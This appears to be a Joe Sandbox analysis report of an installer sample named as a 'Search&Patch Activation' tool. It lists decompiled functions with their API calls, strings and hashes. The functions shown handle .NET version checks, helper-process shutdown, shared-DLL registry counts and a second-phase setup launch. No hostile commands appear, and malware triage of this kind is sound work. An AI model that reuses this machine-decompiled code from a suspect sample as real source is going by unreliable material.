API ID: QueryValue$FormatMessageOpen
String ID: $RegOpenKeyEx$Software\Microsoft\Windows\CurrentVersion\SharedDLLs$Software\Microsoft\Windows\CurrentVersion\SharedDLLs
API String ID: 2812809588-1577016196
Opcode ID: b38089396f9bd1e80361f7f4aec32eb98fbac3fcb49b8dce190468ca970a8865
Instruction ID: a1e8c034b49f6a69a24190b621a186803033118ea706e5513908ccb254d87fbd
Opcode Fuzzy Hash: b38089396f9bd1e80361f7f4aec32eb98fbac3fcb49b8dce190468ca970a8865
Instruction Fuzzy Hash: 30914071D00608ABDB00DBE5D952BEEB7F8EB49305F50406BF904F7282D6789E098B69

Uniqueness

Uniqueness Score: -1.00%

Function 00459CE8 Relevance: 19.4, APIs: 3, Strings: 8, Instructions: 165
registryCOMMON

Download Yara Rule

C-Code - Quality: 90%

			E00459CE8(signed int __eax, void* __ebx, void* __ecx, signed int __edx, void* __edi, void* __esi) {
				signed int _v5;
				void* _v12;
				char _v16;
				char _v20;
				char _v24;
				signed int _t79;
				signed int _t82;
				signed int _t83;
				signed int _t130;
				intOrPtr _t162;
				signed int _t175;
				signed int _t177;
				void* _t183;
				void* _t186;

				_t185 = _t186;
				_v16 = 0;
				_t183 = __ecx;
				_v5 = __edx;
				_t130 = __eax;
				_push(_t186);
				_push(0x459ee9);
				_push( *[fs:eax]);
				 *[fs:eax] = _t186 + 0xffffffec;
				if( *0x0049F050 != 0) {
					L16:
					E00403494(_t183,  *((intOrPtr*)(0x49f050)));
					_pop(_t162);
					 *[fs:eax] = _t162;
					_push(E00459EF0);
					return E00403400( &_v16);
				}
				E00459BF4(__eax, __ecx,  &_v16, _t185);
				if(_v5 + 0xfe - 2 >= 0 || E0042E2AC(_t130, "SOFTWARE\\Microsoft\\.NETFramework\\Policy\\v4.0", 0x80000002,  &_v12, 1, 0) != 0) {
					_t79 = _v5 - 1;
					__eflags = _t79;
					if(_t79 == 0) {
						L6:
						_t82 = E0042E2AC(_t130, "SOFTWARE\\Microsoft\\.NETFramework\\Policy\\v2.0", 0x80000002,  &_v12, 1, 0);
						__eflags = _t82;
						if(_t82 != 0) {
							L8:
							_t83 = _v5;
							__eflags = _t83;
							if(_t83 == 0) {
								L10:
								__eflags = E0042E2AC(_t130, "SOFTWARE\\Microsoft\\.NETFramework\\Policy\\v1.1", 0x80000002,  &_v12, 1, 0);
								if(__eflags == 0) {
									_t177 = _t130 & 0x0000007f;
									E0042C88C( *((intOrPtr*)(0x49f044 + _t177 * 4)),  &_v16);
									_t142 = _t177 + _t177;
									__eflags = _t177 + _t177;
									E004035C0(0x49f050 + _t142 * 8, "v1.1.4322", _v16);
									RegCloseKey(_v12);
								}
								goto L12;
							}
							__eflags = _t83 - 3;
							if(__eflags != 0) {
								goto L12;
							}
							goto L10;
						} else {
							_t179 = _t130 & 0x0000007f;
							E0042C88C( *((intOrPtr*)(0x49f044 + (_t130 & 0x0000007f) * 4)),  &_v16);
							E004035C0(0x49f050 + (_t179 + _t179) * 8, "v2.0.50727", _v16);
							RegCloseKey(_v12);
							goto L12;
						}
					}
					__eflags = _t79 != 2;
					if(_t79 != 2) {
						goto L8;
					}
					goto L6;
				} else {
					_t181 = _t130 & 0x0000007f;
					E0042C88C( *((intOrPtr*)(0x49f044 + (_t130 & 0x0000007f) * 4)),  &_v16);
					E004035C0(0x49f050 + (_t181 + _t181) * 8, "v4.0.30319", _v16);
					RegCloseKey(_v12);
					L12:
					_t175 = _v5 & 0x000000ff;
					if( *((intOrPtr*)(0x49f050 + _t175 * 4)) == 0) {
						_t192 = _v5 - 3;
						if(_v5 == 3) {
							E00453B40(".NET Framework not found", _t130, _t175, _t183, __eflags);
						} else {
							_v24 =  *((intOrPtr*)(0x49cb40 + _t175 * 4));
							_v20 = 0xb;
							E00407D84(".NET Framework version %s not found", 0,  &_v24,  &_v16);
							E00453B40(_v16, _t130, _t175, _t183, _t192);
						}
					}
					goto L16;
				}
			}

0x00459ce9
0x00459cf3
0x00459cf6
0x00459cf8
0x00459cfb
0x00459cff
0x00459d00
0x00459d05
0x00459d08
0x00459d21
0x00459eb7
0x00459ece
0x00459ed5
0x00459ed8
0x00459edb
0x00459ee8
0x00459ee8
0x00459d2c
0x00459d38
0x00459d9c
0x00459d9c
0x00459d9e
0x00459da4
0x00459db8
0x00459dbd
0x00459dbf
0x00459e00
0x00459e00
0x00459e03
0x00459e05
0x00459e0b
0x00459e24
0x00459e26
0x00459e2d
0x00459e37
0x00459e46
0x00459e46
0x00459e57
0x00459e60
0x00459e60
0x00000000
0x00459e26
0x00459e07
0x00459e09
0x00000000
0x00000000
0x00000000
0x00459dc1
0x00459dc6
0x00459dd0
0x00459df0
0x00459df9
0x00000000
0x00459df9
0x00459dbf
0x00459da0
0x00459da2
0x00000000
0x00000000
0x00000000
0x00459d57
0x00459d5c
0x00459d66
0x00459d86
0x00459d8f
0x00459e65
0x00459e65
0x00459e7a
0x00459e7c
0x00459e80
0x00459eb2
0x00459e82
0x00459e8d
0x00459e90
0x00459e9e
0x00459ea6
0x00459ea6
0x00459e80
0x00000000
0x00459e7a

APIs

Part of subcall function 00459BF4: RegCloseKey.ADVAPI32(00000000,00000000,00000001,00000000,?,00000000,?,00000002,00459D31,00000000,00459EE9,?,00000000,00000000,00000000), ref: 00459C41

RegCloseKey.ADVAPI32(00000000,00000000,00000001,00000000,00000000,00459EE9,?,00000000,00000000,00000000), ref: 00459D8F
RegCloseKey.ADVAPI32(00000000,00000000,00000001,00000000,00000000,00459EE9,?,00000000,00000000,00000000), ref: 00459DF9

Part of subcall function 0042E2AC: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,00485FB3,?,00000001,?,?,00485FB3,?,00000001,00000000), ref: 0042E2C8

RegCloseKey.ADVAPI32(00000000,00000000,00000001,00000000,00000000,00000001,00000000,00000000,00459EE9,?,00000000,00000000,00000000), ref: 00459E60

Strings

SOFTWARE\Microsoft\.NETFramework\Policy\v1.1, xrefs: 00459E13
v1.1.4322, xrefs: 00459E52
.NET Framework version %s not found, xrefs: 00459E99
.NET Framework not found, xrefs: 00459EAD
v4.0.30319, xrefs: 00459D81
SOFTWARE\Microsoft\.NETFramework\Policy\v2.0, xrefs: 00459DAC
SOFTWARE\Microsoft\.NETFramework\Policy\v4.0, xrefs: 00459D42
v2.0.50727, xrefs: 00459DEB

Memory Dump Source

Source File: 00000016.00000002.498488432.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true

Associated: 00000016.00000002.498477952.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500477326.000000000049C000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500607953.000000000049D000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500726505.000000000049E000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500953897.00000000004AE000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_400000_A1Photo-&-Art-Enhancer_Search&Patch_Activation.jbxd

Similarity

API ID: Close$Open
String ID: .NET Framework not found$.NET Framework version %s not found$SOFTWARE\Microsoft\.NETFramework\Policy\v1.1$SOFTWARE\Microsoft\.NETFramework\Policy\v2.0$SOFTWARE\Microsoft\.NETFramework\Policy\v4.0$v1.1.4322$v2.0.50727$v4.0.30319
API String ID: 2976201327-446240816
Opcode ID: 7b0c25b8646ceea1d37bfb8bee6288df2e7d11155bddc49a46ccef07b9b08108
Instruction ID: 28c73818cd0e0a48a6ea9a4a771bbd3fec88f932accac903083750955a5b2269
Opcode Fuzzy Hash: 7b0c25b8646ceea1d37bfb8bee6288df2e7d11155bddc49a46ccef07b9b08108
Instruction Fuzzy Hash: 6A51C135A041059BCB00DF65D8A2BEE77BADB49305F5444BBA901D7383EB39AE0EC758

Uniqueness

Uniqueness Score: -1.00%

Function 004592D4 Relevance: 19.3, APIs: 6, Strings: 5, Instructions: 70
sleepsynchronizationCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004592D4(intOrPtr __eax, void* __edx) {
				long _v12;
				long _v16;
				void* __ebx;
				void* __esi;
				void* _t44;
				void* _t50;
				intOrPtr _t51;
				DWORD* _t52;

				_t19 = __eax;
				_t52 =  &_v12;
				_t44 = __edx;
				_t51 = __eax;
				if( *((char*)(__eax + 4)) == 0) {
					L11:
					return _t19;
				}
				 *((char*)(__eax + 5)) = 1;
				_v16 =  *((intOrPtr*)(__eax + 0x10));
				_v12 = 0;
				E004587AC("Stopping 64-bit helper process. (PID: %u)", __edx, 0,  &_v16, _t50, __eax);
				CloseHandle( *(_t51 + 0xc));
				 *(_t51 + 0xc) = 0;
				while(WaitForSingleObject( *(_t51 + 8), 0x2710) == 0x102) {
					E004585A0("Helper isn\'t responding; killing it.", _t44, 0, _t50, _t51);
					TerminateProcess( *(_t51 + 8), 1);
				}
				if(GetExitCodeProcess( *(_t51 + 8), _t52) == 0) {
					E004585A0("Helper process exited, but failed to get exit code.", _t44, 0, _t50, _t51);
				} else {
					if( *_t52 != 0) {
						_v16 =  *_t52;
						_v12 = 0;
						E004587AC("Helper process exited with failure code: 0x%x", _t44, 0,  &_v16, _t50, _t51);
					} else {
						E004585A0("Helper process exited.", _t44, 0, _t50, _t51);
					}
				}
				CloseHandle( *(_t51 + 8));
				 *(_t51 + 8) = 0;
				_t19 = 0;
				 *((intOrPtr*)(_t51 + 0x10)) = 0;
				 *((char*)(_t51 + 4)) = 0;
				if(_t44 == 0) {
					goto L11;
				} else {
					Sleep(0xfa);
					return 0;
				}
			}

0x004592d4
0x004592d6
0x004592d9
0x004592db
0x004592e1
0x004593b3
0x004593b3
0x004593b3
0x004592e7
0x004592ee
0x004592f2
0x00459302
0x0045930b
0x00459312
0x0045932c
0x0045931c
0x00459327
0x00459327
0x0045934d
0x00459384
0x0045934f
0x00459353
0x00459364
0x00459368
0x00459378
0x00459355
0x0045935a
0x0045935a
0x00459353
0x0045938d
0x00459394
0x00459397
0x00459399
0x0045939c
0x004593a2
0x00000000
0x004593a4
0x004593a9
0x00000000
0x004593a9

APIs

CloseHandle.KERNEL32(?), ref: 0045930B
TerminateProcess.KERNEL32(?,00000001,?,00002710,?), ref: 00459327
WaitForSingleObject.KERNEL32(?,00002710,?), ref: 00459335
GetExitCodeProcess.KERNEL32 ref: 00459346
CloseHandle.KERNEL32(?,?,?,?,00002710,?,00000001,?,00002710,?), ref: 0045938D
Sleep.KERNEL32(000000FA,?,?,?,?,00002710,?,00000001,?,00002710,?), ref: 004593A9

Strings

Helper process exited with failure code: 0x%x, xrefs: 00459373
Helper process exited, but failed to get exit code., xrefs: 0045937F
Helper isn't responding; killing it., xrefs: 00459317
Helper process exited., xrefs: 00459355
Stopping 64-bit helper process. (PID: %u), xrefs: 004592FD

Memory Dump Source

Source File: 00000016.00000002.498488432.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true

Associated: 00000016.00000002.498477952.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500477326.000000000049C000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500607953.000000000049D000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500726505.000000000049E000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500953897.00000000004AE000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_400000_A1Photo-&-Art-Enhancer_Search&Patch_Activation.jbxd

Similarity

API ID: CloseHandleProcess$CodeExitObjectSingleSleepTerminateWait
String ID: Helper isn't responding; killing it.$Helper process exited with failure code: 0x%x$Helper process exited, but failed to get exit code.$Helper process exited.$Stopping 64-bit helper process. (PID: %u)
API String ID: 3355656108-1243109208
Opcode ID: 1f6f08a59c4241316fc5b92a60363e61fedf2df981dbba95ebf56664ec05cabe
Instruction ID: e85fc657e119397c97ed97e1faf084f02df15e80d39cea5897c552b80fc28b15
Opcode Fuzzy Hash: 1f6f08a59c4241316fc5b92a60363e61fedf2df981dbba95ebf56664ec05cabe
Instruction Fuzzy Hash: 1C212A70604740DBC720E779C88575B77D49F48305F04892EBC9ADB292EA78EC489B6A

Uniqueness

Uniqueness Score: -1.00%

Function 00454D24 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 228
registryCOMMON

Download Yara Rule

C-Code - Quality: 82%

			E00454D24(void* __ebx, signed int __ecx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				signed int _v5;
				void* _v12;
				char _v16;
				int _v20;
				char _v24;
				int _v28;
				int _v32;
				char _v36;
				char* _v40;
				char _v44;
				char* _v48;
				char _v52;
				char _v56;
				char _v60;
				intOrPtr _v64;
				char* _v68;
				char _v72;
				char _v76;
				void* _t81;
				void* _t82;
				signed int _t92;
				void* _t96;
				void* _t100;
				void* _t127;
				void* _t132;
				void* _t164;
				intOrPtr _t186;
				intOrPtr _t188;
				void* _t201;
				void* _t203;
				void* _t204;
				intOrPtr _t205;

				_t203 = _t204;
				_t205 = _t204 + 0xffffffb8;
				_v44 = 0;
				_v56 = 0;
				_v72 = 0;
				_v76 = 0;
				_v36 = 0;
				_v5 = __ecx;
				_t201 = __edx;
				_push(_t203);
				_push(0x454fbf);
				_push( *[fs:edx]);
				 *[fs:edx] = _t205;
				_t82 = E0042E274(_t81, "Software\\Microsoft\\Windows\\CurrentVersion\\SharedDLLs", 0x80000002,  &_v16,  &_v12, 0, 3, 0, 0, 0);
				_t170 = _t82;
				if(_t82 != 0) {
					E00453DAC(0x80000002,  &_v56);
					_v52 = _v56;
					_v48 = "Software\\Microsoft\\Windows\\CurrentVersion\\SharedDLLs";
					E00451C00(0x44, 1,  &_v52,  &_v44);
					E0040357C( &_v44, 0x455050);
					_push( &_v44);
					_v68 = "RegCreateKeyEx";
					E004071F8(_t170,  &_v72);
					_v64 = _v72;
					E0042ED58(_t170,  &_v76);
					_v60 = _v76;
					E00451C00(0x3b, 2,  &_v68,  &_v56);
					_pop(_t164);
					E0040357C(_t164, _v56);
					E0040909C(_v44, 1);
					E0040311C();
				}
				_v40 = E00403738(_t201);
				_v24 = 0;
				_v32 = 4;
				_push(_t203);
				_push(0x454efb);
				_push( *[fs:eax]);
				 *[fs:eax] = _t205;
				if(RegQueryValueExA(_v12, _v40, 0,  &_v28, 0,  &_v20) == 0) {
					_t127 = _v28 - 1;
					if(_t127 == 0) {
						if(E0042E1DC() != 0) {
							_v24 = E00407228(_v36,  &_v36);
							_v32 = 1;
						}
					} else {
						_t132 = _t127 - 2;
						if(_t132 == 0) {
							if(_v20 >= 1 && _v20 <= 4) {
								if(RegQueryValueExA(_v12, _v40, 0, 0,  &_v24,  &_v20) != 0) {
									E00409070();
								}
								_v32 = 3;
							}
						} else {
							if(_t132 == 1) {
								_v20 = 4;
								if(RegQueryValueExA(_v12, _v40, 0, 0,  &_v24,  &_v20) != 0) {
									E00409070();
								}
							}
						}
					}
				}
				_t92 = 0;
				_pop(_t186);
				 *[fs:eax] = _t186;
				if(_v24 < 0) {
					_t92 = 0;
					_v24 = 0;
				}
				if(((_t92 & 0xffffff00 | _v24 == 0x00000000) & _v5) != 0) {
					_v24 = _v24 + 1;
				}
				_v24 = _v24 + 1;
				_t96 = _v32 - 1;
				if(_t96 == 0) {
					E004071F8(_v24,  &_v36);
					_t100 = E00403574(_v36);
					RegSetValueExA(_v12, _v40, 0, _v32, E00403738(_v36), _t100 + 1);
				} else {
					if(_t96 + 0xfffffffe - 2 < 0) {
						RegSetValueExA(_v12, _v40, 0, _v32,  &_v24, 4);
					}
				}
				RegCloseKey(_v12);
				_pop(_t188);
				 *[fs:eax] = _t188;
				_push(0x454fc6);
				E00403420( &_v76, 2);
				E00403400( &_v56);
				E00403400( &_v44);
				return E00403400( &_v36);
			}

0x00454d25
0x00454d27
0x00454d2f
0x00454d32
0x00454d35
0x00454d38
0x00454d3b
0x00454d3e
0x00454d41
0x00454d45
0x00454d46
0x00454d4b
0x00454d4e
0x00454d6d
0x00454d72
0x00454d76
0x00454d88
0x00454d90
0x00454d98
0x00454da5
0x00454db2
0x00454dba
0x00454dc4
0x00454dcc
0x00454dd4
0x00454ddc
0x00454de4
0x00454df1
0x00454df9
0x00454dfa
0x00454e09
0x00454e0e
0x00454e0e
0x00454e1a
0x00454e1f
0x00454e22
0x00454e2b
0x00454e2c
0x00454e31
0x00454e34
0x00454e52
0x00454e5b
0x00454e5c
0x00454e7b
0x00454e85
0x00454e88
0x00454e88
0x00454e5e
0x00454e5e
0x00454e61
0x00454e95
0x00454eb8
0x00454eba
0x00454eba
0x00454ebf
0x00454ebf
0x00454e63
0x00454e64
0x00454ec8
0x00454eea
0x00454eec
0x00454eec
0x00454eea
0x00454e64
0x00454e61
0x00454e5c
0x00454ef1
0x00454ef3
0x00454ef6
0x00454f0e
0x00454f10
0x00454f12
0x00454f12
0x00454f1f
0x00454f21
0x00454f21
0x00454f24
0x00454f2a
0x00454f2b
0x00454f3d
0x00454f45
0x00454f63
0x00454f2d
0x00454f33
0x00454f7e
0x00454f7e
0x00454f33
0x00454f87
0x00454f8e
0x00454f91
0x00454f94
0x00454fa1
0x00454fa9
0x00454fb1
0x00454fbe

APIs

Part of subcall function 0042E274: RegCreateKeyExA.ADVAPI32(?,?,?,?,?,?,?,?,?), ref: 0042E2A0

RegQueryValueExA.ADVAPI32(?,?,00000000,?,00000000,?,00000000,00454EFB,?,00000000,00454FBF), ref: 00454E4B
RegCloseKey.ADVAPI32(?,?,?,00000000,00000004,00000000,00000001,?,00000000,?,00000000,00454EFB,?,00000000,00454FBF), ref: 00454F87

Part of subcall function 0042ED58: FormatMessageA.KERNEL32(00003200,00000000,4C783AFB,00000000,?,00000400,00000000,?,00453A6B,00000000,kernel32.dll,Wow64RevertWow64FsRedirection,00000000,kernel32.dll,Wow64DisableWow64FsRedirection,00000000), ref: 0042ED77

Strings

RegCreateKeyEx, xrefs: 00454DBF
Software\Microsoft\Windows\CurrentVersion\SharedDLLs, xrefs: 00454D63
, xrefs: 00454DAD
Software\Microsoft\Windows\CurrentVersion\SharedDLLs, xrefs: 00454D93

Memory Dump Source

Source File: 00000016.00000002.498488432.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true

Associated: 00000016.00000002.498477952.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500477326.000000000049C000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500607953.000000000049D000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500726505.000000000049E000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500953897.00000000004AE000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_400000_A1Photo-&-Art-Enhancer_Search&Patch_Activation.jbxd

Similarity

API ID: CloseCreateFormatMessageQueryValue
String ID: $RegCreateKeyEx$Software\Microsoft\Windows\CurrentVersion\SharedDLLs$Software\Microsoft\Windows\CurrentVersion\SharedDLLs
API String ID: 2481121983-1280779767
Opcode ID: ad96e2b74533b1f25a57ff52286efab689ec44c2628258f67de485b39b5b3c90
Instruction ID: c7e759269ab329005b5c2b3a4910326777c7a2f104b103968227fab848b04cb9
Opcode Fuzzy Hash: ad96e2b74533b1f25a57ff52286efab689ec44c2628258f67de485b39b5b3c90
Instruction Fuzzy Hash: FB81FE71A00209AFDB10DF95C952BEEB7B8FB48305F50452AF900FB282D7789E45CB69

Uniqueness

Uniqueness Score: -1.00%

Function 00499ABC Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 141
fileCOMMON

Download Yara Rule

C-Code - Quality: 66%

			E00499ABC(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				char _v8;
				struct HWND__* _v12;
				void* _v16;
				char _v20;
				char _v24;
				struct HWND__* _v28;
				char _v32;
				char _v36;
				char _v40;
				CHAR* _t38;
				intOrPtr _t39;
				int _t41;
				struct HINSTANCE__* _t45;
				intOrPtr _t50;
				void* _t63;
				intOrPtr _t76;
				intOrPtr _t95;
				intOrPtr _t97;
				void* _t101;
				void* _t102;
				intOrPtr _t103;

				_t99 = __esi;
				_t98 = __edi;
				_t83 = __ecx;
				_t82 = __ebx;
				_t101 = _t102;
				_t103 = _t102 + 0xffffffdc;
				_push(__ebx);
				_push(__esi);
				_push(__edi);
				_v20 = 0;
				_v40 = 0;
				_v8 = 0;
				_push(_t101);
				_push(0x499c8d);
				_push( *[fs:eax]);
				 *[fs:eax] = _t103;
				E0042DEA8( &_v20, __ebx, __ecx, __edi, __esi);
				if(E004540B8(_v20, _t82,  &_v8, _t98, _t99) == 0) {
					_push(_t101);
					_push( *[fs:eax]);
					 *[fs:eax] = _t103;
					E0045452C(0, _t82, _v8, _t98, _t99);
					_pop(_t97);
					_t83 = 0x499b19;
					 *[fs:eax] = _t97;
				}
				_t38 = E00403738(_v8);
				_t39 =  *0x49f540; // 0x0
				_t41 = CopyFileA(E00403738(_t39), _t38, 0);
				_t106 = _t41;
				if(_t41 == 0) {
					_t76 =  *0x49edf8; // 0x230cdc4
					E00499164(_t76, _t82, _t83, _t98, _t99, _t106);
				}
				SetFileAttributesA(E00403738(_v8), 0x80);
				_t45 =  *0x49e014; // 0x400000
				_v12 = CreateWindowExA(0, "STATIC", 0x499c9c, 0, 0, 0, 0, 0, 0, 0, _t45, 0);
				 *0x49f56c = SetWindowLongA(_v12, 0xfffffffc, E00499314);
				_push(_t101);
				_push(0x499c60);
				_push( *[fs:eax]);
				 *[fs:eax] = _t103;
				_t50 =  *0x49e62c; // 0x2252410
				SetWindowPos( *(_t50 + 0x20), 0, 0, 0, 0, 0, 0x97);
				E0042D8DC(0, _t82,  &_v40, _t98, _t99);
				_v36 = _v40;
				_v32 = 0xb;
				_v28 = _v12;
				_v24 = 0;
				E00407D84("/SECONDPHASE=\"%s\" /FIRSTPHASEWND=$%x ", 1,  &_v36,  &_v20);
				_push( &_v20);
				E0042D7BC( &_v40, _t82, 1, _t98, _t99, 0);
				_pop(_t63);
				E0040357C(_t63, _v40);
				_v16 = E0049920C(_v8, _t82, _v20, _t98, _t99, 0);
				do {
				} while (E004992D8() == 0 && MsgWaitForMultipleObjects(1,  &_v16, 0, 0xffffffff, 0xff) == 1);
				CloseHandle(_v16);
				_pop(_t95);
				 *[fs:eax] = _t95;
				_push(E00499C67);
				return DestroyWindow(_v12);
			}

0x00499abc
0x00499abc
0x00499abc
0x00499abc
0x00499abd
0x00499abf
0x00499ac2
0x00499ac3
0x00499ac4
0x00499ac7
0x00499aca
0x00499acd
0x00499ad2
0x00499ad3
0x00499ad8
0x00499adb
0x00499ae1
0x00499af3
0x00499af7
0x00499afd
0x00499b00
0x00499b0a
0x00499b11
0x00499b13
0x00499b14
0x00499b14
0x00499b28
0x00499b2e
0x00499b39
0x00499b3e
0x00499b40
0x00499b42
0x00499b47
0x00499b47
0x00499b5a
0x00499b61
0x00499b86
0x00499b99
0x00499ba0
0x00499ba1
0x00499ba6
0x00499ba9
0x00499bbb
0x00499bc4
0x00499bd2
0x00499bda
0x00499bdd
0x00499be4
0x00499be7
0x00499bf8
0x00499c00
0x00499c04
0x00499c0c
0x00499c0d
0x00499c1d
0x00499c20
0x00499c25
0x00499c44
0x00499c4b
0x00499c4e
0x00499c51
0x00499c5f

APIs

Part of subcall function 004540B8: CreateFileA.KERNEL32(00000000,C0000000,00000000,00000000,00000002,00000080,00000000,.tmp,00499C8D,_iu,?,00000000,004541F2), ref: 004541A7
Part of subcall function 004540B8: CloseHandle.KERNEL32(00000000,00000000,C0000000,00000000,00000000,00000002,00000080,00000000,.tmp,00499C8D,_iu,?,00000000,004541F2), ref: 004541B7

CopyFileA.KERNEL32 ref: 00499B39
SetFileAttributesA.KERNEL32(00000000,00000080,00000000,00000000,00000000,00000000,00499C8D), ref: 00499B5A
CreateWindowExA.USER32 ref: 00499B81
SetWindowLongA.USER32 ref: 00499B94
SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000097,00000000,00499C60,?,?,000000FC,00499314,00000000,STATIC,00499C9C), ref: 00499BC4
MsgWaitForMultipleObjects.USER32 ref: 00499C38
CloseHandle.KERNEL32(?,?,?,00000000,00000000,00000000,00000000,00000000,00000097,00000000,00499C60,?,?,000000FC,00499314,00000000), ref: 00499C44

Part of subcall function 0045452C: WritePrivateProfileStringA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00454613

DestroyWindow.USER32(?,00499C67,00000000,00000000,00000000,00000000,00000000,00000097,00000000,00499C60,?,?,000000FC,00499314,00000000,STATIC), ref: 00499C5A

Strings

STATIC, xrefs: 00499B7A
/SECONDPHASE="%s" /FIRSTPHASEWND=$%x , xrefs: 00499BF3

Memory Dump Source

Source File: 00000016.00000002.498488432.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true

Associated: 00000016.00000002.498477952.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500477326.000000000049C000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500607953.000000000049D000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500726505.000000000049E000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500953897.00000000004AE000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_400000_A1Photo-&-Art-Enhancer_Search&Patch_Activation.jbxd

Similarity

API ID: Window$File$CloseCreateHandle$AttributesCopyDestroyLongMultipleObjectsPrivateProfileStringWaitWrite
String ID: /SECONDPHASE="%s" /FIRSTPHASEWND=$%x $STATIC
API String ID: 1549857992-2312673372
Opcode ID: 1051cedb416743bcf88a6ace486b2dd274972f18721ff5a7613edce71ef42c03
Instruction ID: eb5cd57210df4e96fe4a968102c50da815bdab5ab87cf2bc8b3503f8df2cfa0e
Opcode Fuzzy Hash: 1051cedb416743bcf88a6ace486b2dd274972f18721ff5a7613edce71ef42c03
Instruction Fuzzy Hash: 36414170A00208AFDF00EBA9DD42F9E7BF8EB09704F11457AF510F7291D6799E008B68

Uniqueness

Uniqueness Score: -1.00%

Function 0042F654 Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 82libraryloaderCOMMON

Download Yara Rule

APIs

GetActiveWindow.USER32 ref: 0042F660
GetModuleHandleA.KERNEL32(user32.dll), ref: 0042F674
GetProcAddress.KERNEL32(00000000,MonitorFromWindow), ref: 0042F681
GetProcAddress.KERNEL32(00000000,GetMonitorInfoA), ref: 0042F68E
GetWindowRect.USER32 ref: 0042F6DA
SetWindowPos.USER32(?,00000000,?,?,00000000,00000000,0000001D,?,00000000), ref: 0042F718

Strings

MonitorFromWindow, xrefs: 0042F67B
(, xrefs: 0042F6B9
user32.dll, xrefs: 0042F66F
GetMonitorInfoA, xrefs: 0042F688

Memory Dump Source

Source File: 00000016.00000002.498488432.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true

Associated: 00000016.00000002.498477952.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500477326.000000000049C000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500607953.000000000049D000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500726505.000000000049E000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500953897.00000000004AE000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_400000_A1Photo-&-Art-Enhancer_Search&Patch_Activation.jbxd

Similarity

API ID: Window$AddressProc$ActiveHandleModuleRect
String ID: ($GetMonitorInfoA$MonitorFromWindow$user32.dll
API String ID: 2610873146-3407710046
Opcode ID: 5e6605ca9b65c224cfc07a0aeee16f59c7bd4f650269865c0fd0a92bfb0552d7
Instruction ID: 4fddece845ce4b02eeba35f690bf3974305695bca327a465bc6d277b32236c01
Opcode Fuzzy Hash: 5e6605ca9b65c224cfc07a0aeee16f59c7bd4f650269865c0fd0a92bfb0552d7
Instruction Fuzzy Hash: F721C2B67006146BD300EA78EC85F3B77A9DBD4710F98463AF944DB382DA78EC084B59

Uniqueness

Uniqueness Score: -1.00%

Function 00463DE4 Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 82libraryloaderCOMMON

Download Yara Rule

APIs

GetActiveWindow.USER32 ref: 00463DF0
GetModuleHandleA.KERNEL32(user32.dll), ref: 00463E04
GetProcAddress.KERNEL32(00000000,MonitorFromWindow), ref: 00463E11
GetProcAddress.KERNEL32(00000000,GetMonitorInfoA), ref: 00463E1E
GetWindowRect.USER32 ref: 00463E6A
SetWindowPos.USER32(?,00000000,?,?,00000000,00000000,0000001D,?,00000000), ref: 00463EA8

Strings

GetMonitorInfoA, xrefs: 00463E18
user32.dll, xrefs: 00463DFF
(, xrefs: 00463E49
MonitorFromWindow, xrefs: 00463E0B

Memory Dump Source

Source File: 00000016.00000002.498488432.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true

Associated: 00000016.00000002.498477952.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500477326.000000000049C000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500607953.000000000049D000.00000008.00000001.01000000.0000000B.sdmpDownload File
